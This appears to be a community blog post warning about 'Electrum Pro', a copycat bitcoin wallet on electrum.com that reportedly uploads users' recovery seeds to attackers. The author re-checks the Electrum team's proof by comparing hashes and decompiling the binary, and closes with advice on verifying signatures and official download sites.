Warning: Electrum Pro Scam Wallet Stealing Users Cryptocurrency

Whether markets go up or down there always seems to. be one sector of the market always making money regardless and those are scammers. Just when you think we've seen everything scammers can throw at us from ICO exit scams to lending coins and ponzi schemes swindling willing investors, unwilling investors have been fairly safe, until now.

Popular bitcoin wallet service Electrum has released evidence demonstrating that copycat client “Electrum Pro” is “bitcoin-stealing malware.”

About Electrum

First launched in 2011, Electrum has long been one of bitcoin’s most popular wallet clients, and many users trust the wallet for its proven security, ease-of-use, and its support for advanced features like multisig authentication and compatibility with hardware wallets like Ledger and Trezor.

The brand has been a staple and synonymous with security and is probably the reason why copycats targetted it is a centre of a wallet scam. Recently, a new wallet that goes by a similar name — Electrum Pro — popped up with the domain name, electrum.com, clearly attempting to divert users from the official website at electrum.org.

The team behind Electrum now claims Electrum Pro is a malware meant to steal bitcoins. To make things worse, Electrum Pro has been bidding on brand terms in adwords and shows above the legitimate Electrum on Google search because of Google Ads, a fact that will clearly trip up many users.

This also goes to show why cryptocurrency projects need to purchase all domains available to tehm from .org. com. io and more, its a small price to pay to make sure your customers and potential customers are lead to the correct place.

Secondly it also makes a big case for Googles decsion to ban cryptocurrency ads from its adwords and display network platform

Response from Electrum

The team behind Electrum has given a detailed explanation on Github which anyone can follow to find the rogue lines of code on Electrum Pro which steals recovery seeds and sends them to the attackers.

Aecovery seed is a feature in most modern wallets where random words are generated that can be used to recover a wallet if the keys are lost. Once these keys are transmitted, the scammers can use it to retrieve user wallets along with all their funds.

The Proof

The proof given is a step by step guide to decompiling the python based binary. The proof claims that within the binary, where the seeds are created, an additional step exists which uploads the seed to electrum(dot)com. The official website for the Electrum wallet is electrum.org, which we can be sure of due to its link on the external site bitcoin.org.

In order to verify the claims, I followed the steps outlined. To begin I downloaded the zip file for Electrum Pro, and verified the hash of my file matched the one referenced in the proof:

Mine: f497d2681dc00a7470fef7bcef8228964a2412889cd70b098cb8985aa1573e99
Theirs: f497d2681dc00a7470fef7bcef8228964a2412889cd70b098cb8985aa1573e99

The files are identical, meaning that I should see the same data further on that is stated in the proof, so long as it is true.

Following the steps, one can extract the zip file (in my case with unzip, rather than 7za), and extracted the pyc files from the .exe inside the zip. Once I extracted the pyc files, then you will need to decompile them using uncompyle6 and found the following python 3 code:

The above code is the same as what is shown in the proof provide by @ElectrumWallet. And as such, I can externally verify that Electrum Pro contains the lines referenced in the proof.

What does this mean?

It is now proven that Electrum Pro steals wallet seeds on creation. Meaning that any coins stored in a wallet created with this tool are accessible to anyone with access to electrum(dot)com. If you mistakenly used this wallet, you should move your coins to a secure wallet as soon as possible.

Not the first scam

This is not the first time a fraudulent Electrum wallet has appeared. Scammers have registered similar domains, hosting an infected version of the software for users to download. However, this is the first time scammers have been able to use the electrum.com domain.

The website looks reasonably professional, and it is hard to identify it as a fraud unless you have been to the original site before. If you visit the scammer .com domain and have meta mask installed on your browser you should receive a scammer alert but this is not for every visitor so we need to spead the word on this scam.

The website’s WHOIS information is not public, so information about the domain’s legal owner cannot be discovered.

Recommendations from Electrum

To combat these problems, Electrum recommends users check the GPG signatures before they start using the wallet. In addition to GPG signatures, Electrum is working towards verifying the wallet using Windows native scheme. Also, some point, they intend to have the official app on Mac App Store to avoid similar scams.

If you have recently installed Electrum, make sure you installed the official version from electrum.org and not from any other source. If you mistakenly used the malicious wallet, move your bitcoins immediately and remove the application from your computer.

How to avoid malware like this in future

When installing wallets, verify on every step that what you’re doing is correct. Make sure that URLs are correct, confirm said URLs with external sources if possible, and always verify hashes and signatures. In Electrum’s case, for signatures, all official binaries are signed with ThomasV’s PGP key.

To verify other wallets, you should be able to use the keys and hashes provided on the wallet’s home page. This may seem like a lot of work, but how much is security of your coins worth to you?

To use the real Electrum wallet visit - https://electrum.org/#home

Have your say

Which wallets do you use to store your cryptocurrency? Have you heard of Electrum? Are you an Electrum user? What do you think of this scam? I'd like to hear your thoughts and please resteem this post to spread the news on this scam

Let's connect

For more cryptocurrency news or to hear my opinion on whats happening in the market feel free to follow me @chekohler

Sources:

• CCN
• The Next Web
• Block Explorer